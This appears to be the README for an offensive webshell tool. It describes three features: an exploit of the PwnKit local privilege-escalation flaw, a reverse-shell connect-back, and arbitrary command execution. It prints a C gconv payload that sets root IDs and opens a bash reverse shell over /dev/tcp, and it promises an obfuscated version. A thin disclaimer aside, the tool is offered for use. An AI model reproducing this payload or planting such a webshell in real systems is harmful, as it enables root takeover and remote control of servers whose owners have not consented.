This webshell can be used for multi-purposed especially most if you want to manage your web server but you are in an emergency , so why not use a webshell:)
DISCLAIMER : ILLEGAL USE OF OUR TOOLS INCLUDING THIS WEBSHELL WILL NOT HAVE US BEING HELD RESPONSIBLE AT ALL!
Currently has three features which are :
this allows you to put in a base64 encoded string which contains the code run in poppy but with an execution of reverse-shell instead , which means when you execute it , it shall directly test and exploit pwnkit vulnerability using poppy, the payload should be something like this:
#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
system("/usr/bin/sudo -u root /usr/bin/bash -c '/usr/bin/bash -i &>/dev/tcp/127.0.0.1/1337 <&1'");
exit(0);
}
this is a classic one , you just put in your IP and Port and you shall definitely get shell access back to your listener if you are having trouble using the shell feature and you want to use a shell instead:
Allows you to execute shell commands , just by typing your command and clicking execute
Version two will be updated with the following new features:
- MYSQL Connector
- Obfuscated Web-Shell
- Real-Time Shell Spawn
If you wish to contribute or give a suggestion or need to contact us :
email : urchinsec@protonmail.com discord : https://discord.gg/red66VCSEp
Artwork : witchdoctorsec